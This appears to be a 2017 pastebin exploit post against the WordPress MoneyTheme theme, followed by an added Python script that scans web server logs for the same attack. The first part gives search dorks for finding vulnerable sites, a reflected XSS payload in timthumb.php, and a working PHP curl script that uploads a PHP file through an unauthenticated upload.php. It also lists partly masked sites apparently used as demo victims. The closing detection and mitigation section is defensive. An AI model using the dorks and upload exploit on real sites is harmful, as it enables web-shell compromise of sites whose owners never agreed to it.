[POC] Wordpress MoneyTheme Themes XSS | DevilScreaM

Berandal666 Mar 11th, 2017 41 Never
#Title : Wordpress MoneyTheme Themes XSS / Arbitrary File Upload
#Author : DevilScreaM
#Date : 10/27/2013
#Category : Web Applications
#Type : PHP
#Vendor : http://themesjunction.com
#Link : http://themesjunction.com/theme/money_wordpress_template-17129.html

#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |

#Vulnerability : XSS, Arbitrary File Upload

#Dork :

inurl:themes/MoneyTheme/
inurl:wp-content/themes/MoneyTheme/

Cross Site Scripting

Vulnerable at 'timthumb.php' (the 'src' parameter is reflected unencoded):

http://site-target/wp-content/themes/MoneyTheme/timthumb.php?src=[XSS].jpg

Example :

http://cheaXXow.com/wp-content/themes/MoneyTheme/timthumb.php?src=<h1>Berandal</h1>.jpg

======

Arbitrary File Upload

The theme's 'uploads/upload.php' accepts a POST of a 'Filedata' file into the directory named by 'folder' without authentication or file-type checks.

Exploit :

<?php

$uploadfile="berandal.php";

$ch = curl_init("http://site-target/wp-content/themes/MoneyTheme/uploads/upload.php?folder=/wp-content/themes/MoneyTheme/uploads/uploads/");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : http://site-target/wp-content/themes/MoneyTheme/uploads/uploads/berandal.php

berandal.php
<?php
phpinfo();
?>

Demo :

http://weXXX.com/wp-content/themes/MoneyTheme/uploads/upload.php
http://coXXXash.com/wp-content/themes/MoneyTheme/uploads/upload.php
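For site owners who run this theme, the three request patterns above (a non-image 'src' sent to timthumb.php, a POST to the theme's uploads/upload.php, and a later fetch of a .php file from uploads/uploads/) are all visible in ordinary web server access logs. The following detection script is an added example written for this page, not code from the paste or from the theme vendor; it assumes Apache/nginx "combined" log format, and the sample log lines it scans are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" log format (assumed for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Theme directory from the paste; compared case-insensitively.
THEME_DIR = "/wp-content/themes/moneytheme/"

# A legitimate timthumb 'src' is a path or URL ending in an image extension.
# Anything else (angle brackets, quotes, scripts) is flagged.
IMAGE_SRC_RE = re.compile(r'^[\w:./-]+\.(?:jpe?g|png|gif|webp)$', re.IGNORECASE)

def classify_request(method, path):
    """Return a finding tag for a request matching one of the paste's three
    abuse patterns, or None for anything else."""
    parts = urlsplit(path)
    p = parts.path.lower()
    if THEME_DIR not in p:
        return None
    if p.endswith("/timthumb.php"):
        # parse_qs percent-decodes, so %3Ch1%3E becomes <h1> before the check.
        for src in parse_qs(parts.query).get("src", []):
            if not IMAGE_SRC_RE.match(src):
                return "timthumb_src_not_image"
        return None
    if p.endswith("/uploads/upload.php") and method == "POST":
        return "theme_upload_post"
    if "/uploads/uploads/" in p and p.endswith(".php"):
        return "php_in_uploads_dir"
    return None

def scan_log(lines):
    """Parse combined-format lines and return (ip, tag, path) for each hit."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip
        tag = classify_request(m["method"], m["path"])
        if tag:
            findings.append((m["ip"], tag, m["path"]))
    return findings

# Constructed sample log: one benign thumbnail request, the three abuse
# patterns from one client, and an unrelated request.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Mar/2017:10:00:01 +0000] "GET /wp-content/themes/MoneyTheme/timthumb.php?src=images/banner.jpg&w=300 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [11/Mar/2017:10:00:02 +0000] "GET /wp-content/themes/MoneyTheme/timthumb.php?src=%3Ch1%3Ex%3C/h1%3E.jpg HTTP/1.1" 400 120',
    '203.0.113.7 - - [11/Mar/2017:10:00:05 +0000] "POST /wp-content/themes/MoneyTheme/uploads/upload.php?folder=/wp-content/themes/MoneyTheme/uploads/uploads/ HTTP/1.1" 200 45',
    '203.0.113.7 - - [11/Mar/2017:10:00:06 +0000] "GET /wp-content/themes/MoneyTheme/uploads/uploads/berandal.php HTTP/1.1" 200 70000',
    '198.51.100.2 - - [11/Mar/2017:10:01:00 +0000] "GET /index.php HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for ip, tag, path in scan_log(SAMPLE_LOG):
        print(ip, tag, path)
```

The third pattern (a 200 response for a .php file under uploads/uploads/) is the strongest signal, since a correctly configured theme upload directory should never serve PHP; the usual mitigation is to deny script execution in that directory at the web server and to remove or protect upload.php itself.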